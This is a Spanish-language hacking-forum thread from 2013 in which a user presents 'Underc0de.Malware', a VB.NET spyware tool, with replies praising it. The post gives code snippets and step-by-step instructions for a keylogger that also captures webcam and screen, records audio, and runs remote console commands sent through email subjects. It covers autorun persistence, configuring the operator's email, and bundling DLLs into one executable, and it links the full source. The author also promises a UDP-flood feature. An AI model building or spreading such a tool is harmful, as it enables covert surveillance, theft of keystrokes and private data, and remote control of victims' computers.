comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Un Malware llamado "Underc0de.Malware.exe"...!!

  • 7 Respuestas
  • 2178 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« en: Marzo 08, 2013, 01:11:23 am »
Este artículo lo tenía guardado y por falta de tiempo no lo di a conocer, hace una par de semanas para ser exactos creo que fueron 2 publique un artículo que se tratada sobre un “Mouselogger” (denominado así pues capturada los click en determinados procesos), pero esta vez les traigo algo un poco más complejo bueno por así decirlo este. A comparación del lo publicado hace semanas este no captura las coordenadas de los click que se realizan si no por otro lado captura el imágenes de la webcam, grabaciones, envió de código a la terminal y por su puesto el infaltable log del teclado. Eso está incluido en la versión alfa pues puede llegar a salir a la luz los infaltables errores. Pero por  el momento es todo ello lo que nos puede ofrecer la pequeña aplicación que es este caso lleva el nombre de “Underc0de.Malware”.

Una Captura del Solution Explorer:


Cada proceso que a realizar se encuentra en una carpeta especifica, para así de esa manera tener más orden. Empecemos a explicar un poco el código y como se ejecuta:
Código: vb.net
  1.         Keylogger_CreateTxt.load()
  2.  
  3.         Move_Exe_Ejecutarse.MoverExe()
  4.  
  5.         Autorun.Autorun()
  6.        
  7.         BuscarDispositivos()
  8.  
  9.         CreateCarpeta.Carpeta()
  10.      
  11.         Systeminfo.DatumPc()
  12.      
  13.         Intervalo_Pop.Timeejecutar(Intervalo_Pop.tiempototal)
  14.  


1.- Como se ve el primero en ejecutar es la creación de la carpeta pues será esa el nido de nuestro malware
2.- Lo siguiente será mover nuestro exe a dicho carpeta creada
3.- Se ejecutara el autorun
4.- Busca un dispositivo de CamWeb
5.- Realiza ya comprobación para conocer la IP pública, IP privada y el nombre de la PC.
6.- Se ejecuta el intervalo de comprobación POP

Hay un Modulo
Código: vb.net
  1. Config_General
en el cual se encuentra parámetros como el Email, ubicación de Carpetas, tiempo de verificación de POP, Webcam, Log del teclado, Rec Audio,Capture Pantalla y el Terminal. Si se decide cambiar parámetros es en ese modulo donde se debe reemplazar con el valor que usted desea.


Si llega un mensaje del destinatario al que se enviara el mensaje:

Código: vb.net
  1.     Public Config_Para As String = "underc0de@outlook.com"

NOTA: El mensaje que se envía debe ser el mismo al que se enviara el mensaje. Para así otras personas que envían el parametro de un correo diferente el programa los desconosca.
Esto son las variables que reconoce el programa cuando se envía

Código: vb.net
  1.             Dim ComanPantalla As String = "Pantalla"
  2.             Dim ComanWebcam As String = "WebCam"
  3.             Dim RecAudio As String = "RecAudio"
  4.             Dim Terminal As String = "Terminal"
  5.             Dim Keylogger As String = "Keylogger"

Estos variables deben estar en el Asunto


Eso sucederá para Captura de Pantalla, Webcam y Keylogger. Pero a diferencia del Terminal(que lo denomine así al Consola de Windows) en Asunto sería diferente.


La forma de escribirlo en la consola de Win seria: ipconfig /all , el espacio lo he reemplazado por los “:” dos puntos, pero si solo se quiere enviar un consulta sin argumento sería de la siguiente manera:


En este caso después de los dos puntos se encontrara vacio. Pero se debe colocar necesariamente los “:” sin espacio alguno al final.

Mientras para RECAUDIO el intervalo que tu coloques:

Código: vb.net
  1. #Region "Tiempo Verificacion POP"
  2.     Public Tiempo_Verificacion_POP As Integer = 6 'intervalo de 6 minutos para la consulta POP
  3. You are not allowed to view links. Register or Login Region

no debe ser mayor al numero de grabación ( en la siguiente version lo solucionare), para la grabación debe ser de la siguiente manera:

"1" es el tiempo de grabación si deseamos que grabe 2 minutos pero sin llegar a serl el valor de la consulta pop, seria: RecAudio 2 (esto debe ir en asunto)

Como vemos esta line de código

Código: vb.net
  1.     Public Function GETIP()
  2.         Dim req As HttpWebRequest = WebRequest.Create("http://localhost/myIp.php")
  3.         Dim res As HttpWebResponse = req.GetResponse()
  4.         Dim Stream As IO.Stream = res.GetResponseStream()
  5.         Dim sr As StreamReader = New StreamReader(Stream)
  6.         Return (sr.ReadToEnd())
  7.  
  8.     End Function

que se encuetra en
Código: vb.net
  1.  Module Systeminfo

debemos subir un archivo para lograr dicha consulta de manera que nos arroje la ip para ello lo subimos a cualquier hosting.


que se encuentra en:
Ya que el programa necesitas dll para el POP y la WebCam.


Tenemos que fusionarlos (unirlos con el exe) para así tengamos solo un archivo. Para ello será necesario de una tools muy buena ILMerge.
1.- Llevamos a una carpeta los 3 dll mas el exe y un el archivo bat (el cual dejare el link).


2.- Luego vamos a la consola y nos vamos a la ubicación de la carpeta, colocamos lo siguiente.



Seguido nos mostrara el archivo unido.

El archivo bat

Código: DOS
  1. C:\Users\Code\Desktop\Underc0de\ILMerge.exe /target:Winexe /out:underC0de2.exe underc0de.exe OpenPop.dll AForge.Video.DirectShow.dll AForge.Video.dll


Link de Codigo Fuente Underc0de.malware.exe :You are not allowed to view links. Register or Login
Link del Decryter You are not allowed to view links. Register or Login
Link de ILMergeYou are not allowed to view links. Register or Login
Link de myIp.php You are not allowed to view links. Register or Login

'*****************************************
'*****************README******************
'*****************************************
Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Un agradecimiento Especial para la comunidad que me acogio UNDERC0DE
Este proyecto es para vos.

Ya que se enceuntra en la version alfa podria tener algunos errores. Pero por el momento lo he testeado en Win7 y XP (corre de maravilla).
« Última modificación: Diciembre 08, 2014, 02:52:08 pm por Expermicid »

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« Respuesta #1 en: Marzo 08, 2013, 02:40:16 am »
Se ha solucionado un pequeño error.

Saludos

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #2 en: Marzo 25, 2013, 12:35:09 pm »
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« Respuesta #3 en: Marzo 25, 2013, 12:52:52 pm »
You are not allowed to view links. Register or Login
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!


Gracias por el comentario. Aunque es el primero pero bueno. Ahora le agrege una nueva funcion de UDP flood...!! en unos cuantos minutos lo dare a conocer..
Saludos...[H]arkonne

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #4 en: Marzo 25, 2013, 01:54:15 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!


Gracias por el comentario. Aunque es el primero pero bueno. Ahora le agrege una nueva funcion de UDP flood...!! en unos cuantos minutos lo dare a conocer..
Saludos...[H]arkonne

genial, lo esperaremos con ansias :D

saludos!

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Root Security
    • Email
  • Skype: code.punisher
« Respuesta #5 en: Marzo 25, 2013, 03:05:29 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!

Aqui tienes la secuencia: You are not allowed to view links. Register or Login

Saludos...!![H]arkonnen
Gracias por el comentario. Aunque es el primero pero bueno. Ahora le agrege una nueva funcion de UDP flood...!! en unos cuantos minutos lo dare a conocer..
Saludos...[H]arkonne

genial, lo esperaremos con ansias :D

saludos!

Desconectado Gabow135

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
  • Aprender es de Valientes, Rendirse de cobardes
    • Ver Perfil
« Respuesta #6 en: Marzo 25, 2013, 11:42:32 pm »
que exelente trabajo se te felicita..:!!!
Aprender es de Valientes, Rendirse de cobardes

Desconectado Alvares97

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • Todo es tan Dificil antes de ser sencillo
    • Ver Perfil
    • Playa de bits
    • Email
« Respuesta #7 en: Junio 10, 2013, 04:12:57 pm »
muy util tu software
esta permitido caerse pero levantarse es obligatorio

 

¿Te gustó el post? COMPARTILO!



Malware que no deja entrar en google

Iniciado por rollth

Respuestas: 6
Vistas: 2213
Último mensaje Marzo 13, 2015, 07:48:37 am
por blackdrake
Pack de tutoriales de creación de Malware!!!.

Iniciado por J0k3$

Respuestas: 8
Vistas: 5982
Último mensaje Noviembre 05, 2015, 11:38:34 pm
por ChaoKon
Cifrado de Malware a Mano by Zero

Iniciado por hdbreaker

Respuestas: 7
Vistas: 3840
Último mensaje Septiembre 14, 2016, 05:32:07 pm
por grep
[TIP] Sacar Firma "Mal_Poison3" de Trend y Otras Mas

Iniciado por Cronos

Respuestas: 0
Vistas: 1083
Último mensaje Julio 29, 2011, 02:45:11 pm
por Cronos
Explotacion de "God Mode" orientada a la creacion de malware

Iniciado por sadfud

Respuestas: 0
Vistas: 1078
Último mensaje Octubre 10, 2016, 04:59:29 pm
por sadfud